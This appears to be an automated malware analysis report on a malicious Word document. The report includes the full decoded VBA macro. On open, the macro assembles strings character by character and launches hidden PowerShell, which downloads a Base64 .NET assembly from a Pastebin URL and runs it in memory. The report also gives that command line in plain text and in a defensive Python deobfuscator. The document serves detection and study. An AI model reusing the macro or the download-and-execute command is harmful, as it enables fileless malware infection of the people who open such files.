Verdict: MALICIOUS
Risk score: 150

Malware Insights

MITRE ATT&CK: T1566.001 Spearphishing Attachment
The sample is a malicious Word document whose VBA macro runs from the Document_Open auto-execution handler. Every string the macro needs is assembled one character at a time from separately declared variables (A0..A75, P0..P187, C0..C12, R0..R2), so no ProgID, method name, command line or URL appears as a literal in the source or in the document's URL extraction. Once concatenated, the macro calls CreateObject("WScript.Shell") and invokes its Run method indirectly through CallByName with the window style vbHide, launching:

powershell.exe -noexit -ExecutionPolicy Bypass -windowstyle hidden -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/pw1Ht9hR'))).EntryPoint.Invoke($null,$null)

This downloads a Base64-encoded .NET assembly from a Pastebin raw paste, loads it reflectively inside the PowerShell process and calls its entry point, so the second stage is never written to disk as a file. -ExecutionPolicy Bypass and -windowstyle hidden (together with the hidden WScript.Shell window) suppress prompts and visible windows, and -noexit keeps the PowerShell host alive after the payload's entry point returns. The Document_Open auto-execution, the per-character string obfuscation and the CreateObject/CallByName indirection together strongly indicate malicious intent.
Heuristics (6)

- VBA macros detected [medium] (OLE_VBA_MACROS, 4 related findings): the document contains VBA macro code.
- CreateObject call [high] (OLE_VBA_CREATEOBJ). Matched line in script:
  Set X = CreateObject(cmdALL)
- CallByName call [high] (OLE_VBA_CALLBYNAME). Matched line in script:
  CallByName X, rALL, VbMethod, (ALL & pALL), vbHide
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro [low] (OLE_VBA_DOCOPEN). Matched line in script:
  Private Sub Document_Open()
- Embedded URL [info] (EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All eleven URLs below were found in document text (OLE body) and are XML namespace identifiers from embedded XMP/RDF image metadata and OOXML schemas, not network indicators. The Pastebin URL the macro contacts is absent from this list because it exists only as single-character fragments until the macro runs.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/photoshop/1.0/
  - http://ns.adobe.com/xap/1.0/mm/
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
  - http://ns.adobe.com/tiff/1.0/
  - http://ns.adobe.com/exif/1.0/
  - http://schemas.openxmlformats.org/drawingml/2006/main
  - http://schemas.openxmlformats.org/officeDocument/2006/bibliography
  - http://schemas.openxmlformats.org/officeDocument/2006/customXml
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7948 bytes | 8fb3af443b3fefbd77543676546511a756c4103aa004dd392bc9635e3decb4f3 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim A0
A0 = "p"
Dim A1
A1 = "o"
Dim A2
A2 = "w"
Dim A3
A3 = "e"
Dim A4
A4 = "r"
Dim A5
A5 = "s"
Dim A6
A6 = "h"
Dim A7
A7 = "e"
Dim A8
A8 = "l"
Dim A9
A9 = "l"
Dim A10
A10 = "."
Dim A11
A11 = "e"
Dim A12
A12 = "x"
Dim A13
A13 = "e"
Dim A14
A14 = " "
Dim A15
A15 = "-"
Dim A16
A16 = "n"
Dim A17
A17 = "o"
Dim A18
A18 = "e"
Dim A19
A19 = "x"
Dim A20
A20 = "i"
Dim A21
A21 = "t"
Dim A22
A22 = " "
Dim A23
A23 = "-"
Dim A24
A24 = "E"
Dim A25
A25 = "x"
Dim A26
A26 = "e"
Dim A27
A27 = "c"
Dim A28
A28 = "u"
Dim A29
A29 = "t"
Dim A30
A30 = "i"
Dim A31
A31 = "o"
Dim A32
A32 = "n"
Dim A33
A33 = "P"
Dim A34
A34 = "o"
Dim A35
A35 = "l"
Dim A36
A36 = "i"
Dim A37
A37 = "c"
Dim A38
A38 = "y"
Dim A39
A39 = " "
Dim A40
A40 = "B"
Dim A41
A41 = "y"
Dim A42
A42 = "p"
Dim A43
A43 = "a"
Dim A44
A44 = "s"
Dim A45
A45 = "s"
Dim A46
A46 = " "
Dim A47
A47 = "-"
Dim A48
A48 = "w"
Dim A49
A49 = "i"
Dim A50
A50 = "n"
Dim A51
A51 = "d"
Dim A52
A52 = "o"
Dim A53
A53 = "w"
Dim A54
A54 = "s"
Dim A55
A55 = "t"
Dim A56
A56 = "y"
Dim A57
A57 = "l"
Dim A58
A58 = "e"
Dim A59
A59 = " "
Dim A60
A60 = "h"
Dim A61
A61 = "i"
Dim A62
A62 = "d"
Dim A63
A63 = "d"
Dim A64
A64 = "e"
Dim A65
A65 = "n"
Dim A66
A66 = " "
Dim A67
A67 = "-"
Dim A68
A68 = "c"
Dim A69
A69 = "o"
Dim A70
A70 = "m"
Dim A71
A71 = "m"
Dim A72
A72 = "a"
Dim A73
A73 = "n"
Dim A74
A74 = "d"
Dim A75
A75 = " "
Dim ALL
ALL = A0 & A1 & A2 & A3 & A4 & A5 & A6 & A7 & A8 & A9 & A10 & A11 & A12 & A13 & A14 & A15 & A16 & A17 & A18 & A19 & A20 & A21 & A22 & A23 & A24 & A25 & A26 & A27 & A28 & A29 & A30 & A31 & A32 & A33 & A34 & A35 & A36 & A37 & A38 & A39 & A40 & A41 & A42 & A43 & A44 & A45 & A46 & A47 & A48 & A49 & A50 & A51 & A52 & A53 & A54 & A55 & A56 & A57 & A58 & A59 & A60 & A61 & A62 & A63 & A64 & A65 & A66 & A67 & A68 & A69 & A70 & A71 & A72 & A73 & A74 & A75
Dim P0
P0 = "["
Dim P1
P1 = "S"
Dim P2
P2 = "y"
Dim P3
P3 = "s"
Dim P4
P4 = "t"
Dim P5
P5 = "e"
Dim P6
P6 = "m"
Dim P7
P7 = "."
Dim P8
P8 = "R"
Dim P9
P9 = "e"
Dim P10
P10 = "f"
Dim P11
P11 = "l"
Dim P12
P12 = "e"
Dim P13
P13 = "c"
Dim P14
P14 = "t"
Dim P15
P15 = "i"
Dim P16
P16 = "o"
Dim P17
P17 = "n"
Dim P18
P18 = "."
Dim P19
P19 = "A"
Dim P20
P20 = "s"
Dim P21
P21 = "s"
Dim P22
P22 = "e"
Dim P23
P23 = "m"
Dim P24
P24 = "b"
Dim P25
P25 = "l"
Dim P26
P26 = "y"
Dim P27
P27 = "]"
Dim P28
P28 = ":"
Dim P29
P29 = ":"
Dim P30
P30 = "L"
Dim P31
P31 = "o"
Dim P32
P32 = "a"
Dim P33
P33 = "d"
Dim P34
P34 = "("
Dim P35
P35 = "["
Dim P36
P36 = "S"
Dim P37
P37 = "y"
Dim P38
P38 = "s"
Dim P39
P39 = "t"
Dim P40
P40 = "e"
Dim P41
P41 = "m"
Dim P42
P42 = "."
Dim P43
P43 = "C"
Dim P44
P44 = "o"
Dim P45
P45 = "n"
Dim P46
P46 = "v"
Dim P47
P47 = "e"
Dim P48
P48 = "r"
Dim P49
P49 = "t"
Dim P50
P50 = "]"
Dim P51
P51 = ":"
Dim P52
P52 = ":"
Dim P53
P53 = "F"
Dim P54
P54 = "r"
Dim P55
P55 = "o"
Dim P56
P56 = "m"
Dim P57
P57 = "B"
Dim P58
P58 = "a"
Dim P59
P59 = "s"
Dim P60
P60 = "e"
Dim P61
P61 = "6"
Dim P62
P62 = "4"
Dim P63
P63 = "S"
Dim P64
P64 = "t"
Dim P65
P65 = "r"
Dim P66
P66 = "i"
Dim P67
P67 = "n"
Dim P68
P68 = "g"
Dim P69
P69 = "("
Dim P70
P70 = "("
Dim P71
P71 = "N"
Dim P72
P72 = "e"
Dim P73
P73 = "w"
Dim P74
P74 = "-"
Dim P75
P75 = "O"
Dim P76
P76 = "b"
Dim P77
P77 = "j"
Dim P78
P78 = "e"
Dim P79
P79 = "c"
Dim P80
P80 = "t"
Dim P81
P81 = " "
Dim P82
P82 = "S"
Dim P83
P83 = "y"
Dim P84
P84 = "s"
Dim P85
P85 = "t"
Dim P86
P86 = "e"
Dim P87
P87 = "m"
Dim P88
P88 = "."
Dim P89
P89 = "N"
Dim P90
P90 = "e"
Dim P91
P91 = "t"
Dim P92
P92 = "."
Dim P93
P93 = "W"
Dim P94
P94 = "e"
Dim P95
P95 = "b"
Dim P96
P96 = "C"
Dim P97
P97 = "l"
Dim P98
P98 = "i"
Dim P99
P99 = "e"
Dim P100
P100 = "n"
Dim P101
P101 = "t"
Dim P102
P102 = ")"
Dim P103
P103 = "."
Dim P104
P104 = "D"
Dim P105
P105 = "o"
Dim P106
P106 = "w"
Dim P107
P107 = "n"
Dim P108
P108 = "l"
Dim P109
P109 = "o"
Dim P110
P110 = "a"
Dim P111
P111 = "d"
Dim P112
P112 = "S"
Dim P113
P113 = "t"
Dim P114
P114 = "r"
Dim P115
P115 = "i"
Dim P116
P116 = "n"
Dim P117
P117 = "g"
Dim P118
P118 = "("
Dim P119
P119 = "'"
Dim P120
P120 = "h"
Dim P121
P121 = "t"
Dim P122
P122 = "t"
Dim P123
P123 = "p"
Dim P124
P124 = "s"
Dim P125
P125 = ":"
Dim P126
P126 = "/"
Dim P127
P127 = "/"
Dim P128
P128 = "p"
Dim P129
P129 = "a"
Dim P130
P130 = "s"
Dim P131
P131 = "t"
Dim P132
P132 = "e"
Dim P133
P133 = "b"
Dim P134
P134 = "i"
Dim P135
P135 = "n"
Dim P136
P136 = "."
Dim P137
P137 = "c"
Dim P138
P138 = "o"
Dim P139
P139 = "m"
Dim P140
P140 = "/"
Dim P141
P141 = "r"
Dim P142
P142 = "a"
Dim P143
P143 = "w"
Dim P144
P144 = "/"
Dim P145
P145 = "p"
Dim P146
P146 = "w"
Dim P147
P147 = "1"
Dim P148
P148 = "H"
Dim P149
P149 = "t"
Dim P150
P150 = "9"
Dim P151
P151 = "h"
Dim P152
P152 = "R"
Dim P153
P153 = "'"
Dim P154
P154 = ")"
Dim P155
P155 = ")"
Dim P156
P156 = ")"
Dim P157
P157 = "."
Dim P158
P158 = "E"
Dim P159
P159 = "n"
Dim P160
P160 = "t"
Dim P161
P161 = "r"
Dim P162
P162 = "y"
Dim P163
P163 = "P"
Dim P164
P164 = "o"
Dim P165
P165 = "i"
Dim P166
P166 = "n"
Dim P167
P167 = "t"
Dim P168
P168 = "."
Dim P169
P169 = "I"
Dim P170
P170 = "n"
Dim P171
P171 = "v"
Dim P172
P172 = "o"
Dim P173
P173 = "k"
Dim P174
P174 = "e"
Dim P175
P175 = "("
Dim P176
P176 = "$"
Dim P177
P177 = "n"
Dim P178
P178 = "u"
Dim P179
P179 = "l"
Dim P180
P180 = "l"
Dim P181
P181 = ","
Dim P182
P182 = "$"
Dim P183
P183 = "n"
Dim P184
P184 = "u"
Dim P185
P185 = "l"
Dim P186
P186 = "l"
Dim P187
P187 = ")"
Dim pALL
pALL = P0 & P1 & P2 & P3 & P4 & P5 & P6 & P7 & P8 & P9 & P10 & P11 & P12 & P13 & P14 & P15 & P16 & P17 & P18 & P19 & P20 & P21 & P22 & P23 & P24 & P25 & P26 & P27 & P28 & P29 & P30 & P31 & P32 & P33 & P34 & P35 & P36 & P37 & P38 & P39 & P40 & P41 & P42 & P43 & P44 & P45 & P46 & P47 & P48 & P49 & P50 & P51 & P52 & P53 & P54 & P55 & P56 & P57 & P58 & P59 & P60 & P61 & P62 & P63 & P64 & P65 & P66 & P67 & P68 & P69 & P70 & P71 & P72 & P73 & P74 & P75 & P76 & P77 & P78 & P79 & P80 & P81 & P82 & P83 & P84 & P85 & P86 & P87 & P88 & P89 & P90 & P91 & P92 & P93 & P94 & P95 & P96 & P97 & P98 & P99 & P100 & P101 & P102 & P103 & P104 & P105 & P106 & P107 & P108 & P109 & P110 & P111 & P112 & P113 & P114 & P115 & P116 & P117 & P118 & P119 & P120 & P121 & P122 & P123 & P124 & P125 & P126 & P127 & P128 & P129 & P130 & P131 & P132 & P133 & P134 & P135 & P136 & P137 & P138 & P139 & P140 & P141 & P142 & P143 & P144 & P145 & P146 & P147 & P148 & P149 & P150 & P151 & P152 & P153 & P154 & P155 & P156 & P157 & P158 & P159 & P160 _
& P161 & P162 & P163 & P164 & P165 & P166 & P167 & P168 & P169 & P170 & P171 & P172 & P173 & P174 & P175 & P176 & P177 & P178 & P179 & P180 & P181 & P182 & P183 & P184 & P185 & P186 & P187
Dim C0
C0 = "W"
Dim C1
C1 = "s"
Dim C2
C2 = "c"
Dim C3
C3 = "r"
Dim C4
C4 = "i"
Dim C5
C5 = "p"
Dim C6
C6 = "t"
Dim C7
C7 = "."
Dim C8
C8 = "S"
Dim C9
C9 = "h"
Dim C10
C10 = "e"
Dim C11
C11 = "l"
Dim C12
C12 = "l"
Dim cmdALL
cmdALL = C0 & C1 & C2 & C3 & C4 & C5 & C6 & C7 & C8 & C9 & C10 & C11 & C12
Set X = CreateObject(cmdALL)
Dim R0
R0 = "R"
Dim R1
R1 = "u"
Dim R2
R2 = "n"
Dim rALL
rALL = R0 & R1 & R2
CallByName X, rALL, VbMethod, (ALL & pALL), vbHide
End Sub
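As an added example (not the analyzer's own code and not from the sample's author), the Python below resolves the per-character string building the macro uses, rebuilds the WScript.Shell.Run invocation, flags the PowerShell behaviours the summary describes, and applies the same auto-exec/exec-token pairing logic as OLE_VBA_PCODE_AUTOEXEC_EXEC to both the raw source and the decoded strings. The embedded VBA is a constructed, condensed stand-in for macros.bas (a few characters per variable rather than exactly one) that decodes to the same command line; pass the carved file as an argument to run it on the real macro instead. The script name vba_deobf.py is assumed.

```python
# Added example, not the analyzer's code: resolve the one-character-per-variable string
# building in this macro, reconstruct the CreateObject/CallByName call it ends in, and
# apply the auto-exec + exec-token pairing of OLE_VBA_PCODE_AUTOEXEC_EXEC.
import re
import sys

# Constructed, condensed stand-in for the carved macros.bas (same shape: assignments joined
# with '&', a ' _' continuation, CreateObject + CallByName) with several characters per
# variable instead of exactly one; it decodes to the same command line as the real macro.
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
A0 = "p"
A1 = "owersh"
A2 = "ell.exe -noexit -ExecutionPolicy Bypass "
A3 = "-windowstyle hidden -command "
ALL = A0 & A1 & A2 & _
A3
P0 = "[System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("
P1 = "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/pw1Ht9hR'))).EntryPoint.Invoke($null,$null)"
pALL = P0 & P1
cmdALL = "WScript" & ".Sh" & "ell"
Set X = CreateObject(cmdALL)
rALL = "R" & "u" & "n"
CallByName X, rALL, VbMethod, (ALL & pALL), vbHide
End Sub
'''

ASSIGN = re.compile(r'^\s*(?!Set\b|Dim\b)([A-Za-z_]\w*)\s*=\s*(.+?)\s*$', re.I)
CREATEOBJ = re.compile(r'\bSet\s+(\w+)\s*=\s*CreateObject\((.+)\)', re.I)
CALLBYNAME = re.compile(r'\bCallByName\s+(\w+)\s*,([^,]+),\s*VbMethod\s*,\s*(.+)$', re.I)
AUTOEXEC = ('Auto_Open', 'AutoOpen', 'Document_Open', 'Workbook_Open', 'Auto_Close', 'AutoClose')
EXEC_TOKENS = ('Shell', 'CreateObject', 'GetObject', 'PowerShell', 'cmd.exe', 'URLDownloadToFile',
               'WinHttp', 'XMLHTTP', 'ADODB.Stream', 'ShellExecute', 'ExecuteExcel4Macro')

def logical_lines(src):
    """Join VBA ' _' line continuations (the real pALL assignment uses one) into single lines."""
    out, buf = [], ''
    for line in src.splitlines():
        if line.rstrip().endswith(' _'):
            buf += line.rstrip()[:-1]
        else:
            out.append(buf + line)
            buf = ''
    return out

def split_top(expr, sep):
    """Split on sep outside quotes and parentheses; "" inside a literal is an escaped quote."""
    parts, cur, depth, in_str, i = [], '', 0, False, 0
    while i < len(expr):
        ch = expr[i]
        if in_str and expr[i:i + 2] == '""':
            cur, i = cur + '""', i + 2
            continue
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not in_str and ch == sep and depth == 0:
            parts, cur, i = parts + [cur.strip()], '', i + 1
            continue
        cur, i = cur + ch, i + 1
    return parts + [cur.strip()]

def resolve(term, env, cache):
    """Evaluate one '&' operand: a string literal, a parenthesised sub-chain, or a variable."""
    term = term.strip()
    if len(term) > 1 and term[0] == term[-1] == '"':
        return term[1:-1].replace('""', '"')
    if term[:1] == '(' and term[-1:] == ')':
        return concat(term[1:-1], env, cache)
    if term in env and term not in cache:
        cache[term] = term                      # guard against self-referential assignments
        cache[term] = concat(env[term], env, cache)
    return cache.get(term, term)                # unknown names (e.g. vbHide) stay visible

def concat(expr, env, cache):
    return ''.join(resolve(t, env, cache) for t in split_top(expr, '&'))

def recover_invocation(src):
    """Resolve the CreateObject ProgID plus the CallByName method and arguments (None if absent)."""
    lines = logical_lines(src)
    env = {m.group(1): m.group(2) for m in map(ASSIGN.match, lines) if m}
    cache = {}
    objects = {m.group(1): concat(m.group(2), env, cache) for m in map(CREATEOBJ.search, lines) if m}
    for m in filter(None, map(CALLBYNAME.search, lines)):
        var, method, rest = m.groups()
        return {'progid': objects.get(var, var), 'method': concat(method, env, cache),
                'args': [concat(a, env, cache) for a in split_top(rest, ',')]}
    return None

def triage_command(cmd):
    """Flag the behaviours the report describes in a recovered command line; returns (flags, urls)."""
    checks = {'execution-policy-bypass': r'-ExecutionPolicy\s+Bypass|-ep\s+bypass',
              'hidden-window': r'-windowstyle\s+hidden|-w\s+hidden',
              'remote-download': r'DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest',
              'base64-decode': r'FromBase64String',
              'reflective-assembly-load': r'Reflection\.Assembly\]::Load|\.EntryPoint\.Invoke'}
    hits = {name for name, pat in checks.items() if re.search(pat, cmd, re.I)}
    return hits, re.findall(r"https?://[^\s'\")]+", cmd)

def autoexec_exec_pair(text):
    """OLE_VBA_PCODE_AUTOEXEC_EXEC logic: fires only when an auto-exec entry point AND an
    execution token both occur in the text; returns (fired, auto_tokens, exec_tokens)."""
    low = text.lower()
    auto = [t for t in AUTOEXEC if t.lower() in low]
    execs = [t for t in EXEC_TOKENS if t.lower() in low]
    return bool(auto and execs), auto, execs

if __name__ == '__main__':
    src = open(sys.argv[1], errors='replace').read() if len(sys.argv) > 1 else SAMPLE_VBA
    inv = recover_invocation(src) or {'progid': '', 'method': '', 'args': ['']}
    print(inv, triage_command(inv['args'][0]), autoexec_exec_pair(src),
          autoexec_exec_pair(src + ' '.join([inv['progid'], inv['method'], *inv['args']])), sep='\n')
```

Two things the pairing check makes visible: on the raw source only Document_Open and CreateObject are present (that pair alone is what fires the heuristic), while Shell, PowerShell and the WScript.Shell ProgID appear only after the concatenations are resolved. The same reason explains why the Pastebin URL is missing from the Embedded URL list: as a string it exists only at run time, so neither the document-body nor the macro channel of the URL extractor can see it, and the recovered command line is the place to pull network indicators from.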